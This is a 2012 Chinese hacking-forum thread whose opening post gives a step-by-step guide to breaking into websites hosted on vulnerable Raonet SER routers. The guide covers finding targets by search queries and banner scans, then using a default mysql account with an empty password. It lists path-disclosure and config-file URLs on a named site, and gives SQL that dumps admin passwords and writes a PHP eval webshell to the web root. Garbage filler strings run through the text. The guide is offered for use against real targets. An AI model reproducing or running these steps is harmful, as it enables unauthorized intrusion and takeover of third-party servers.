找回密码
 立即注册
查看: 3449|回复: 2
打印 上一主题 下一主题

利用某路由器漏洞入侵国外站点

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:30:18 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  寻找存在漏洞的路由器方法:
* R6 N3 |. u0 I. h. E: f% y8 g
+ h3 s# d9 Z, J; S8 p1:google搜索'Raonet Subscriber Ethernet Router'+ Q* j: _7 D7 p+ u. P- O5 Y+ ]2 ?, H

5 H' J$ ~& _% O- h* c# C" {2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001+ M& G: {* c/ y0 I% g; i2 ?# B; p

: D' _. F" c# F) a3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。- k( F7 H/ |3 }4 B$ P) R

1 I5 L  q" F9 W//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
: k6 k' {) R2 u% R
9 w* L* B6 d5 [# Z+ m# Z# e7 M - S7 b) k* K0 \

5 B, Q$ ?" B7 s/ y$ ]4 I4 S入侵步骤:2 ~9 s1 n' s  r( T
$ t& x2 N% l5 V& T- y6 o6 j0 u
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php, w" J, t1 i$ U

) J: v, P4 J9 r) a2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc2 M0 u- b! P% H+ G
3:得到密码后连接,查看GUI管理密码:
( A% _4 n9 |) c& c6 quse ser_5009 a% l6 s3 w. a
select id,passwd from user;7 d6 v* |) N  r% {0 t$ L
4:通过数据库写入webshell,执行命令:
2 ?0 f! n5 r# T- c+ u; h) Fuse mysql;$ m% }( w. ^3 x
create table ok(cmd TEXT);# K0 A* E. h; b' A; y+ \1 B2 ^
insert into ok values("<?php @eval($_POST[cmd])?>");
  g  Z# L- j5 @8 w' }# \select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";$ X9 C& H# w+ \
drop table ok;
3 _; c# @* K* b: Q' _( X. i) N3 F+ J! z  h' f
5:连接后门shell.php
  V* n3 h" z6 i  D) R% Z( M% V
3 c# ^+ @" G2 u' u0 ^3 f6. 搞定!
& g3 t( W* ~" `7 b
$ a3 M1 I9 v' A9 _
回复

使用道具 举报

沙发
发表于 2013-7-27 20:06:50 | 只看该作者
这个后果可以很严重的说
回复 支持 反对

使用道具 举报

板凳
发表于 2013-7-29 12:07:54 | 只看该作者
不错哦,黑服务器补洞。。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表